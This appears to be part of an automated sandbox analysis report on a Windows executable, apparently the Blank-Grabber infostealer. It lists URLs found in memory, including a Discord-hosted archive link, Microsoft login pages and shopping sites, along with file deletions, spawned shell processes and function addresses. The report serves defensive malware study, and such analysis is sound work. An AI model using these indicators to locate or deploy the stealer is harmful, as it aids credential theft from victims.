              Source: e45AiBoV6X.exe, 00000001.00000002.1986630728.000002290AF8B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1984164140.000002290AF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
              Source: e45AiBoV6X.exe, 00000001.00000002.1985469081.000002290AA69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
              Source: e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
              Source: e45AiBoV6X.exe, 00000001.00000003.1785007830.000002290AEBB000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1986264729.000002290AEB5000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1764714930.000002290AEB7000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1881510721.000002290AEB4000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1983212942.000002290AEB4000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1835081648.000002290AEBB000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1789596748.000002290AEBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
              Source: e45AiBoV6X.exe, 00000001.00000003.1984164140.000002290AF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
              Source: e45AiBoV6X.exe, 00000001.00000002.1987306791.000002290B039000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1982906328.000002290B033000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1986949781.000002290B00B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1986903181.000002290AFF2000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1984419770.000002290AFF0000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1982906328.000002290B00B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1983434642.000002290B038000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1983989604.000002290AFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-ext-1.discordapp.net/external/etSU0hGkd0ttMXA41AUjUl74oI1ajbez8WS2N-KLvK4/https/raw.g
              Source: e45AiBoV6X.exe, 00000001.00000002.1988820175.000002290BF40000.00000004.00001000.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1982362710.000002290B8E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B698000.00000004.00001000.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1988820175.000002290BF4C000.00000004.00001000.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1982362710.000002290B8E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com
              Source: e45AiBoV6X.exe, 00000001.00000003.1982906328.000002290B033000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1983434642.000002290B038000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://media.discordapp.net/attachments/1248781326262468744/1264315028736180234/Blank-user.rar?ex=
              Source: powershell.exe, 00000006.00000002.1937080762.00000219519F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1843488107.0000029681972000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1862744633.00000296901BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1862744633.000002969007C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
              Source: e45AiBoV6X.exe, 00000001.00000002.1988543492.000002290B7C2000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870
              Source: e45AiBoV6X.exe, 00000001.00000002.1985975693.000002290ACD0000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1987882294.000002290B4E0000.00000004.00001000.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1982906328.000002290B006000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1988543492.000002290B7C2000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://o64374.ingest.sentry.io;
              Source: powershell.exe, 00000025.00000002.1843488107.0000029681606000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
              Source: powershell.exe, 00000025.00000002.1843488107.0000029681606000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX
              Source: e45AiBoV6X.exe, 00000001.00000002.1992435238.00007FFDFB77F000.00000040.00000001.01000000.00000004.sdmp | String found in binary or memory: https://python.org/dev/peps/pep-0263/
              Source: e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
              Source: e45AiBoV6X.exe, 00000001.00000003.1739482392.000002290AE26000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1738014114.000002290AE01000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz
              Source: e45AiBoV6X.exe, 00000000.00000003.1719392220.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sectigo.com/CPS0
              Source: e45AiBoV6X.exe, 00000001.00000003.1791355053.000002290B121000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1881624103.000002290B043000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1982906328.000002290B043000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1987306791.000002290B043000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1833541794.000002290B043000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1777566420.000002290B121000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1983434642.000002290B043000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org
              Source: e45AiBoV6X.exe, 00000001.00000003.1764894979.000002290B065000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1766242664.000002290B164000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1764223855.000002290B164000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: e45AiBoV6X.exe, 00000001.00000003.1764894979.000002290B065000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefox
              Source: e45AiBoV6X.exe, 00000001.00000003.1830286193.000002290B15C000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1829771493.000002290BB8B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1880836585.000002290BB8B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1986388661.000002290AF60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: e45AiBoV6X.exe, 00000001.00000003.1830286193.000002290B15C000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1829771493.000002290BB8B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1880836585.000002290BB8B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1986388661.000002290AF60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: e45AiBoV6X.exe, 00000001.00000002.1984931538.000002290897F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
              Source: e45AiBoV6X.exe, 00000001.00000002.1986630728.000002290AF8B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1985975693.000002290ACD0000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1984164140.000002290AF88000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://twitter.com/
              Source: e45AiBoV6X.exe, 00000001.00000002.1987767316.000002290B3D0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
              Source: e45AiBoV6X.exe, 00000001.00000002.1987655713.000002290B2D0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
              Source: e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B698000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://weibo.com/
              Source: e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B678000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.aliexpress.com/
              Source: e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B644000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.ca/
              Source: e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B644000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.co.uk/
              Source: e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B644000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/
              Source: e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B600000.00000004.00001000.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B644000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.de/
              Source: e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B644000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.fr/
              Source: e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B644000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.avito.ru/
              Source: e45AiBoV6X.exe, 00000000.00000003.1718378444.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718073686.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718378444.000001F32EEEC000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718495170.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
              Source: e45AiBoV6X.exe, 00000001.00000003.1833183214.000002290B14E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
              Source: e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B698000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/
              Source: e45AiBoV6X.exe, 00000001.00000003.1833183214.000002290B14E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B678000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.leboncoin.fr/
              Source: e45AiBoV6X.exe, 00000001.00000003.1791355053.000002290B121000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1987767316.000002290B3D0000.00000004.00001000.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B6E0000.00000004.00001000.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1836907759.000002290B04E000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1982906328.000002290B043000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1803278420.000002290B055000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1987306791.000002290B043000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1833541794.000002290B043000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1777566420.000002290B121000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1983434642.000002290B043000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org
              Source: e45AiBoV6X.exe, 00000001.00000003.1881624103.000002290B043000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1764894979.000002290B047000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1982906328.000002290B043000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1987306791.000002290B043000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1833541794.000002290B043000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1983434642.000002290B043000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/
              Source: e45AiBoV6X.exe, 00000001.00000003.1764894979.000002290B065000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/
              Source: e45AiBoV6X.exe, 00000001.00000003.1764894979.000002290B065000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1766242664.000002290B164000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1764223855.000002290B164000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/
              Source: e45AiBoV6X.exe, 00000001.00000003.1764894979.000002290B065000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
              Source: e45AiBoV6X.exe, 00000001.00000002.1987767316.000002290B3D0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_c
              Source: e45AiBoV6X.exe, 00000001.00000003.1764894979.000002290B065000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: e45AiBoV6X.exe, 00000001.00000003.1764894979.000002290B047000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
              Source: e45AiBoV6X.exe, 00000001.00000002.1988820175.000002290BF48000.00000004.00001000.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1982362710.000002290B8E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com
              Source: e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B698000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.olx.pl/
              Source: e45AiBoV6X.exe, 00000000.00000003.1718495170.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmp, e45AiBoV6X.exe, 00000001.00000002.1992103361.00007FFDFB432000.00000004.00000001.01000000.0000000F.sdmp | String found in binary or memory: https://www.openssl.org/H
              Source: e45AiBoV6X.exe, 00000000.00000003.1717679887.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1736201846.000002290AA3D000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1737797560.000002290AA3D000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1736689465.000002290AA40000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1737369965.000002290AA3D000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1725631506.000002290AA3D000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.python.org/dev/peps/pep-0205/
              Source: e45AiBoV6X.exe, 00000001.00000002.1985753646.000002290AAD0000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.dr | String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
              Source: e45AiBoV6X.exe, 00000001.00000002.1986630728.000002290AF8B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1984164140.000002290AF88000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
              Source: e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B644000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.wykop.pl/
              Source: e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B698000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.zhihu.com/
              Source: e45AiBoV6X.exe, 00000001.00000002.1986630728.000002290AF8B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1984164140.000002290AF88000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://yahoo.com/
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 443
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window created: window name: CLIPBRDWNDCLASS

              Spam, unwanted Advertisements and Ransom Demands

              Source: C:\Users\user\Desktop\e45AiBoV6X.exe | File deleted: C:\Users\user\AppData\Local\Temp\ ? ?? \Common Files\Desktop\RAYHIWGKDI.mp3
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe | File deleted: C:\Users\user\AppData\Local\Temp\ ? ?? \Common Files\Desktop\DVWHKMNFNN.docx
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe | File deleted: C:\Users\user\AppData\Local\Temp\ ? ?? \Common Files\Desktop\NIKHQAIQAU.png
              Source: cmd.exe | Process created: 46

              System Summary

              Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Process created: Commandline size = 3647
              Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 3615
              Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe | Code function: 65_2_00007FF629B13A70: CreateFileW, CreateFileW, DeviceIoControl, CloseHandle
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe | Code function: 65_2_00007FF629B3B57C: GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, ExitWindowsEx, ExitWindowsEx
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB00216C1_2_00007FFDFB00216C
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB1360101_2_00007FFDFB136010
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0072AC1_2_00007FFDFB0072AC
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0016221_2_00007FFDFB001622
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB002D0B1_2_00007FFDFB002D0B
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB003BA21_2_00007FFDFB003BA2
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB00736A1_2_00007FFDFB00736A
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB001D831_2_00007FFDFB001D83
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0072571_2_00007FFDFB007257
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0029821_2_00007FFDFB002982
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB001CFD1_2_00007FFDFB001CFD
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB00266C1_2_00007FFDFB00266C
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0038321_2_00007FFDFB003832
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB003A851_2_00007FFDFB003A85
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB1B93C01_2_00007FFDFB1B93C0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB00710D1_2_00007FFDFB00710D
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0053A81_2_00007FFDFB0053A8
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB01D2601_2_00007FFDFB01D260
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0068CA1_2_00007FFDFB0068CA
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB1411701_2_00007FFDFB141170
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB12D1701_2_00007FFDFB12D170
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0252001_2_00007FFDFB025200
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB00144C1_2_00007FFDFB00144C
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0031891_2_00007FFDFB003189
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB001F961_2_00007FFDFB001F96
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB00542F1_2_00007FFDFB00542F
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0065641_2_00007FFDFB006564
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB1417A01_2_00007FFDFB1417A0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0012991_2_00007FFDFB001299
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0055101_2_00007FFDFB005510
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB003A8F1_2_00007FFDFB003A8F
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0054CA1_2_00007FFDFB0054CA
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0015C81_2_00007FFDFB0015C8
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0042871_2_00007FFDFB004287
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0050471_2_00007FFDFB005047
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0044C61_2_00007FFDFB0044C6
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB005BF01_2_00007FFDFB005BF0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB00560F1_2_00007FFDFB00560F
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB005F101_2_00007FFDFB005F10
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB002D741_2_00007FFDFB002D74
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB006D5C1_2_00007FFDFB006D5C
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB1B4BC01_2_00007FFDFB1B4BC0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB002FCC1_2_00007FFDFB002FCC
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB004C141_2_00007FFDFB004C14
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB004B561_2_00007FFDFB004B56
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0011CC1_2_00007FFDFB0011CC
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB00275C1_2_00007FFDFB00275C
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB004A531_2_00007FFDFB004A53
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0022AC1_2_00007FFDFB0022AC
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB00177B1_2_00007FFDFB00177B
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0065A01_2_00007FFDFB0065A0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB006EBF1_2_00007FFDFB006EBF
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0044031_2_00007FFDFB004403
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB00362F1_2_00007FFDFB00362F
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB00592F1_2_00007FFDFB00592F
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0012171_2_00007FFDFB001217
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0011401_2_00007FFDFB001140
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0010AA1_2_00007FFDFB0010AA
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0022FC1_2_00007FFDFB0022FC
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0026E91_2_00007FFDFB0026E9
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0014241_2_00007FFDFB001424
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB002E8C1_2_00007FFDFB002E8C
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB1403001_2_00007FFDFB140300
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB004C371_2_00007FFDFB004C37
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0041011_2_00007FFDFB004101
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB005B731_2_00007FFDFB005B73
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB006C211_2_00007FFDFB006C21
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB12C7D01_2_00007FFDFB12C7D0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0025EF1_2_00007FFDFB0025EF
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0069E71_2_00007FFDFB0069E7
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0B07501_2_00007FFDFB0B0750
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB002C751_2_00007FFDFB002C75
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB01C6201_2_00007FFDFB01C620
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB1B84901_2_00007FFDFB1B8490
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB01C4801_2_00007FFDFB01C480
